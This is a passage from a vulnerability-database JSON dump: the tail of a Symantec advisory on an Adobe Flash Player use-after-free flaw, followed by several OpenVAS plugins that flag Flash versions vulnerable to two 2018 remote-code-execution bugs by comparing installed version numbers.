* Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Google Chrome \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-02-01T00:00:00", "published": "2018-02-01T00:00:00", "id": "SMNTC-102893", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102893", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4878 Use After Free Remote Code Execution Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-10-24T21:13:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813024", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows (apsb18-05)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813024\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Windows (apsb18-05)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T16:52:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n within Microsoft Edge or Internet Explorer and is prone to multiple remote code\n execution vulnerabilities.", "modified": "2020-05-14T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813030", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities (apsb18-05)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813030\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities (apsb18-05)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n within Microsoft Edge or Internet Explorer and is prone to multiple remote code\n execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player within Microsoft Edge or\n Internet Explorer on,\n\n Windows 10 Version 1511 for x32/x64 Edition,\n\n Windows 10 Version 1607 for x32/x64 Edition,\n\n Windows 10 Version 1703 for x32/x64 Edition,\n\n Windows 10 Version 1709 for x32/x64 Edition,\n\n Windows 10 x32/x64 Edition,\n\n Windows 8.1 for x32/x64 Edition and\n\n Windows Server 2012/2012 R2/2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1, win2016:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"29.0.0.113\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 29.0.0.113\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:00:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813029", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813029\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier within Google Chrome on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T20:57:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813028", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813028\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier within Google Chrome on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:13:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813026", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813026", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux (apsb18-05)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813026\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux (apsb18-05)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and earlier on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813025", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X (apsb18-05)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813025\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X (apsb18-05)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T20:59:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310813027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813027", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsb18-05)-Windows", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities(apsb18-05)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813027\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 